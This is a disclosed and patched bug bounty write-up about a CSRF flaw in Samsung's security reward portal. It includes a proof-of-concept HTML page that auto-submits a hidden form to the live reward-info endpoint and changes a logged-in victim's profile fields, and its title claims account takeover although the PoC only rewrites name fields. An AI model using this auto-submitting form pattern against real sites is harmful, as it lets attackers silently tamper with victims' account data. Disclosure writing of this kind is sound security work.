CSRF leads to Account Takeover | Samsung

Description:

Vulnerability: CSRF

Impact: An attacker who gets a logged-in researcher to open a crafted page can change or delete the reward-profile fields: Name for acknowledgement, Full Name, Nationality, Country or Region of Residence, Address of Residence, Postal code, Phone number.

Samsung requires this information before it begins the reward process, and it is used for reward payment and tax purposes only, which is why a silent, cross-site rewrite of these fields matters.

csrf.html:


<!-- Attacker-hosted page. When a researcher who is logged in to the reward portal
     loads it, the browser submits this form to the portal with the victim's session
     cookie attached. The endpoint accepted the update because it required no
     anti-CSRF token and did not reject the cross-site request. -->
<form action="https://security.samsungmobile.com/saveMyRewardInfo.smsr" method="POST" name="hiSamsung">
    <input type="hidden" name="userName" value="Testing by Ando">
    <input type="hidden" name="rewardName" value="Testing by Ando">
</form>
<script>
    // Auto-submit on load; no click from the victim is needed.
    document.forms.hiSamsung.submit();
</script>

PoC video: https://youtu.be/Res3bI49wGE


Timeline:

mm/dd/yyyy

06/19/2022 - Bug Found
06/19/2022 - Submit Report
06/20/2022 - Triaged
06/29/2022 - Patching
07/07/2022 - Bounty awarded by Samsung
08/12/2022 - Close

LinkedIn: Alessandro Rumampuk
YouTube: R,ando
Facebook: Ando
Twitter: R ando
